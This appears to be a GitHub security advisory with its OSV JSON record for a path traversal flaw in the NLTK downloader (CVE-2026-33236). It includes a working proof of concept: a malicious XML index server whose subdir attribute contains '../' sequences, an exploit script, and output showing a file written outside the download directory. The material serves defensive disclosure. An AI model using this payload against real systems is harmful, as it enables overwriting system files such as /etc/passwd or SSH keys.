GHSA-469J-VMHF-R6V7
Vulnerability from github – Published: 2026-03-19 12:42 – Updated: 2026-03-25 18:21
Summary
NLTK has a Downloader Path Traversal Vulnerability (AFO) - Arbitrary File Overwrite
Details
Vulnerability Description
The NLTK downloader does not validate the subdir and id attributes when it processes a remote XML index file. An attacker who controls the XML index server can supply values containing path traversal sequences (such as ../), which can lead to:
- Arbitrary Directory Creation: Create directories at arbitrary locations in the file system
- Arbitrary File Creation: Create arbitrary files
- Arbitrary File Overwrite: Overwrite critical system files (such as /etc/passwd, ~/.ssh/authorized_keys, etc.)
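To make the traversal concrete, the following minimal sketch mirrors the two path joins quoted in this advisory and normalizes the result. It is an illustration only, not NLTK code: the helper name joined_path and the example download directory are hypothetical, and posixpath is used so the output is the same on every platform.

```python
import posixpath


def joined_path(download_dir, subdir, pkg_id, ext=".zip"):
    """Hypothetical helper: join the attributes the way the advisory describes."""
    # First join: subdir and id come straight from the XML index.
    filename = posixpath.join(subdir, pkg_id + ext)
    # Second join: the result is appended to the download directory.
    # normpath collapses the "../" segments to show where the write lands.
    return posixpath.normpath(posixpath.join(download_dir, filename))


benign = joined_path("/home/user/nltk_data", "corpora", "brown")
hostile = joined_path("/home/user/nltk_data", "../../../tmp", "test_file")

print(benign)   # /home/user/nltk_data/corpora/brown.zip
print(hostile)  # /tmp/test_file.zip
```

Three "../" segments are enough here because the example download directory is three levels deep; the PoC later in this advisory uses a longer run so that it works regardless of depth.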
Vulnerability Principle
Key Code Locations
1. XML Parsing Without Validation (nltk/downloader.py:253)
self.filename = os.path.join(subdir, id + ext)
- subdir and id are taken directly from XML attributes without any validation
2. Path Construction Without Checks (nltk/downloader.py:679)
filepath = os.path.join(download_dir, info.filename)
- Directly uses filename, which may contain path traversal sequences
3. Unrestricted Directory Creation (nltk/downloader.py:687)
os.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)
- Can create arbitrary directories outside the download directory
4. File Writing Without Protection (nltk/downloader.py:695)
with open(filepath, "wb") as outfile:
- Can write to arbitrary locations in the file system
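One common way to guard the four locations above is to resolve the final path and confirm that it still lies inside the download directory before creating directories or opening files. The sketch below shows that general containment check; it is not the fix that NLTK shipped, and resolve_inside is a hypothetical helper name.

```python
import os
import tempfile


def resolve_inside(base_dir, relative_path):
    """Return the resolved path, or raise ValueError if it escapes base_dir."""
    base = os.path.realpath(base_dir)
    # realpath collapses ".." segments and follows symlinks.
    target = os.path.realpath(os.path.join(base, relative_path))
    # commonpath equals base only when target is base or lies beneath it.
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes download directory: {relative_path!r}")
    return target


base = tempfile.mkdtemp(prefix="nltk_sketch_")
inside = resolve_inside(base, os.path.join("corpora", "brown.zip"))

try:
    resolve_inside(base, "../../etc/passwd.zip")
    escaped = True
except ValueError:
    escaped = False

print(inside)
print("traversal accepted:", escaped)
```

Checking the resolved path rather than searching the string for "../" also covers absolute paths and symlinks, since os.path.join discards the base when the second argument is absolute.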
Attack Chain
1. Attacker controls remote XML index server
↓
2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../>
↓
3. Victim executes: downloader.download('passwd')
↓
4. Package.fromxml() creates object, filename = "../../etc/passwd.zip"
↓
5. _download_package() constructs path: download_dir + "../../etc/passwd.zip"
↓
6. os.makedirs() creates directory: download_dir + "../../etc"
↓
7. open(filepath, "wb") writes file to /etc/passwd.zip
↓
8. System file is overwritten!
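The chain above starts with the index file, so a complementary check is to reject suspicious attributes as soon as the XML is parsed. The sketch below flags package entries whose id or subdir contains anything other than plain path components. The allow-list pattern, the function names, and the sample index (including the example.invalid URLs) are assumptions made for illustration, not NLTK's actual validation rules.

```python
import re
import xml.etree.ElementTree as ET

# Hypothetical allow-list: letters, digits, dot, underscore, hyphen.
_SAFE_COMPONENT = re.compile(r"[A-Za-z0-9_.-]+")


def is_safe_component(value):
    """True for a single plain path component; '.' and '..' are rejected."""
    return bool(_SAFE_COMPONENT.fullmatch(value)) and value not in (".", "..")


def unsafe_packages(index_xml):
    """Return the ids of <package> entries whose id or subdir fails the check."""
    root = ET.fromstring(index_xml)
    flagged = []
    for pkg in root.iter("package"):
        pkg_id = pkg.get("id", "")
        subdir = pkg.get("subdir", "")
        parts = subdir.split("/") if subdir else []
        if not is_safe_component(pkg_id) or not all(map(is_safe_component, parts)):
            flagged.append(pkg_id)
    return flagged


INDEX = """<?xml version="1.0"?>
<nltk_data>
  <packages>
    <package id="brown" subdir="corpora" url="http://example.invalid/brown.zip"/>
    <package id="passwd" subdir="../../etc" url="http://example.invalid/passwd.zip"/>
  </packages>
</nltk_data>
"""

print(unsafe_packages(INDEX))  # ['passwd']
```

An allow-list is used instead of a block-list so that backslashes, absolute paths, and empty components are rejected without having to enumerate them.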
Impact Scope
- System File Overwrite
Reproduction Steps
Environment Setup
- Install NLTK
pip install nltk
- Prepare malicious server and exploit script (see PoC section)
Reproduction Process
Step 1: Start malicious server
python3 malicious_server.py
Step 2: Run exploit script
python3 exploit_vulnerability.py
Step 3: Verify results
ls -la /tmp/test_file.zip
Proof of Concept
Malicious Server (malicious_server.py)
#!/usr/bin/env python3
"""Malicious HTTP Server - Provides XML index with path traversal"""
import os
import tempfile
import zipfile
from http.server import HTTPServer, BaseHTTPRequestHandler

# Create temporary directory
server_dir = tempfile.mkdtemp(prefix="nltk_malicious_")

# Create malicious XML (contains path traversal)
malicious_xml = """<?xml version="1.0"?>
<nltk_data>
  <packages>
    <package id="test_file" subdir="../../../../../../../../../tmp"
             url="http://127.0.0.1:8888/test.zip"
             size="100" unzipped_size="100" unzip="0"/>
  </packages>
</nltk_data>
"""

# Save files
with open(os.path.join(server_dir, "malicious_index.xml"), "w") as f:
    f.write(malicious_xml)

with zipfile.ZipFile(os.path.join(server_dir, "test.zip"), "w") as zf:
    zf.writestr("test.txt", "Path traversal attack!")


# HTTP Handler
class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/malicious_index.xml':
            self.send_response(200)
            self.send_header('Content-type', 'application/xml')
            self.end_headers()
            with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:
                self.wfile.write(f.read())
        elif self.path == '/test.zip':
            self.send_response(200)
            self.send_header('Content-type', 'application/zip')
            self.end_headers()
            with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:
                self.wfile.write(f.read())
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, format, *args):
        # Suppress per-request logging
        pass


# Start server
if __name__ == "__main__":
    port = 8888
    server = HTTPServer(("0.0.0.0", port), Handler)
    print(f"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml")
    print("Press Ctrl+C to stop")
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print("\nServer stopped")
Exploit Script (exploit_vulnerability.py)
#!/usr/bin/env python3
"""AFO Vulnerability Exploit Script"""
import os
import tempfile


def exploit(server_url="http://127.0.0.1:8888/malicious_index.xml"):
    download_dir = tempfile.mkdtemp(prefix="nltk_exploit_")
    print(f"Download directory: {download_dir}")

    # Exploit vulnerability
    from nltk.downloader import Downloader
    downloader = Downloader(server_index_url=server_url, download_dir=download_dir)
    downloader.download("test_file", quiet=True)

    # Check results
    expected_path = "/tmp/test_file.zip"
    if os.path.exists(expected_path):
        print(f"\n✗ Exploit successful! File written to: {expected_path}")
        print("✗ Path traversal attack successful!")
    else:
        print("\n? File not found, download may have failed")


if __name__ == "__main__":
    exploit()
Execution Results
✗ Exploit successful! File written to: /tmp/test_file.zip
✗ Path traversal attack successful!
Severity
8.1 (High)
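The 8.1 score can be reproduced from the CVSS 3.1 vector recorded for this advisory, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H. The sketch below applies the CVSS 3.1 base-score equations using the metric weights from the specification. It is a simplified calculator that handles only Scope: Unchanged vectors, and the function names are hypothetical.

```python
import math

# Metric weights from the CVSS 3.1 specification (PR values are for Scope: Unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value):
    """Round up to one decimal place, as defined in the CVSS 3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the base score of a Scope: Unchanged CVSS 3.1 vector."""
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    if metrics["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


score = base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H")
print(score)  # 8.1
```

With this vector the impact sub-score is about 5.18 and the exploitability sub-score about 2.84; their sum, roughly 8.01, rounds up to 8.1.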
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "nltk"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "3.9.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33236"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-19T12:42:42Z",
"nvd_published_at": "2026-03-20T23:16:47Z",
"severity": "HIGH"
},
"details": "## Vulnerability Description\n\nThe NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:\n\n1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system\n2. **Arbitrary File Creation**: Create arbitrary files\n3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)\n\n## Vulnerability Principle\n\n### Key Code Locations\n\n**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)\n```python\nself.filename = os.path.join(subdir, id + ext)\n```\n- `subdir` and `id` are directly from XML attributes without any validation\n\n**2. Path Construction Without Checks** (`nltk/downloader.py:679`)\n```python\nfilepath = os.path.join(download_dir, info.filename)\n```\n- Directly uses `filename` which may contain path traversal\n\n**3. Unrestricted Directory Creation** (`nltk/downloader.py:687`)\n```python\nos.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)\n```\n- Can create arbitrary directories outside the download directory\n\n**4. File Writing Without Protection** (`nltk/downloader.py:695`)\n```python\nwith open(filepath, \"wb\") as outfile:\n```\n- Can write to arbitrary locations in the file system\n\n### Attack Chain\n\n```\n1. Attacker controls remote XML index server\n \u2193\n2. Provides malicious XML: \u003cpackage id=\"passwd\" subdir=\"../../etc\" .../\u003e\n \u2193\n3. Victim executes: downloader.download(\u0027passwd\u0027)\n \u2193\n4. Package.fromxml() creates object, filename = \"../../etc/passwd.zip\"\n \u2193\n5. _download_package() constructs path: download_dir + \"../../etc/passwd.zip\"\n \u2193\n6. os.makedirs() creates directory: download_dir + \"../../etc\"\n \u2193\n7. 
open(filepath, \"wb\") writes file to /etc/passwd.zip\n \u2193\n8. System file is overwritten!\n```\n\n## Impact Scope\n1. **System File Overwrite**\n\n## Reproduction Steps\n\n### Environment Setup\n\n1. Install NLTK\n```bash\npip install nltk\n```\n\n2. Prepare malicious server and exploit script (see PoC section)\n\n### Reproduction Process\n\n**Step 1: Start malicious server**\n```bash\npython3 malicious_server.py\n```\n\n**Step 2: Run exploit script**\n```bash\npython3 exploit_vulnerability.py\n```\n\n**Step 3: Verify results**\n```bash\nls -la /tmp/test_file.zip\n```\n\n## Proof of Concept\n\n### Malicious Server (malicious_server.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"Malicious HTTP Server - Provides XML index with path traversal\"\"\"\nimport os\nimport tempfile\nimport zipfile\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\n# Create temporary directory\nserver_dir = tempfile.mkdtemp(prefix=\"nltk_malicious_\")\n\n# Create malicious XML (contains path traversal)\nmalicious_xml = \"\"\"\u003c?xml version=\"1.0\"?\u003e\n\u003cnltk_data\u003e\n \u003cpackages\u003e\n \u003cpackage id=\"test_file\" subdir=\"../../../../../../../../../tmp\" \n url=\"http://127.0.0.1:8888/test.zip\" \n size=\"100\" unzipped_size=\"100\" unzip=\"0\"/\u003e\n \u003c/packages\u003e\n\u003c/nltk_data\u003e\n\"\"\"\n\n# Save files\nwith open(os.path.join(server_dir, \"malicious_index.xml\"), \"w\") as f:\n f.write(malicious_xml)\n\nwith zipfile.ZipFile(os.path.join(server_dir, \"test.zip\"), \"w\") as zf:\n zf.writestr(\"test.txt\", \"Path traversal attack!\")\n\n# HTTP Handler\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n if self.path == \u0027/malicious_index.xml\u0027:\n self.send_response(200)\n self.send_header(\u0027Content-type\u0027, \u0027application/xml\u0027)\n self.end_headers()\n with open(os.path.join(server_dir, \u0027malicious_index.xml\u0027), \u0027rb\u0027) as f:\n self.wfile.write(f.read())\n elif self.path == 
\u0027/test.zip\u0027:\n self.send_response(200)\n self.send_header(\u0027Content-type\u0027, \u0027application/zip\u0027)\n self.end_headers()\n with open(os.path.join(server_dir, \u0027test.zip\u0027), \u0027rb\u0027) as f:\n self.wfile.write(f.read())\n else:\n self.send_response(404)\n self.end_headers()\n \n def log_message(self, format, *args):\n pass\n\n# Start server\nif __name__ == \"__main__\":\n port = 8888\n server = HTTPServer((\"0.0.0.0\", port), Handler)\n print(f\"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml\")\n print(\"Press Ctrl+C to stop\")\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n print(\"\\nServer stopped\")\n```\n\n### Exploit Script (exploit_vulnerability.py)\n\n```python\n#!/usr/bin/env python3\n\"\"\"AFO Vulnerability Exploit Script\"\"\"\nimport os\nimport tempfile\n\ndef exploit(server_url=\"http://127.0.0.1:8888/malicious_index.xml\"):\n download_dir = tempfile.mkdtemp(prefix=\"nltk_exploit_\")\n print(f\"Download directory: {download_dir}\")\n \n # Exploit vulnerability\n from nltk.downloader import Downloader\n downloader = Downloader(server_index_url=server_url, download_dir=download_dir)\n downloader.download(\"test_file\", quiet=True)\n \n # Check results\n expected_path = \"/tmp/test_file.zip\"\n if os.path.exists(expected_path):\n print(f\"\\n\u2717 Exploit successful! File written to: {expected_path}\")\n print(f\"\u2717 Path traversal attack successful!\")\n else:\n print(f\"\\n? File not found, download may have failed\")\n\nif __name__ == \"__main__\":\n exploit()\n```\n\n### Execution Results\n\n```\n\u2717 Exploit successful! File written to: /tmp/test_file.zip\n\u2717 Path traversal attack successful!\n```",
"id": "GHSA-469j-vmhf-r6v7",
"modified": "2026-03-25T18:21:27Z",
"published": "2026-03-19T12:42:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33236"
},
{
"type": "WEB",
"url": "https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a"
},
{
"type": "PACKAGE",
"url": "https://github.com/nltk/nltk"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "NLTK has a Downloader Path Traversal Vulnerability (AFO) - Arbitrary File Overwrite"
}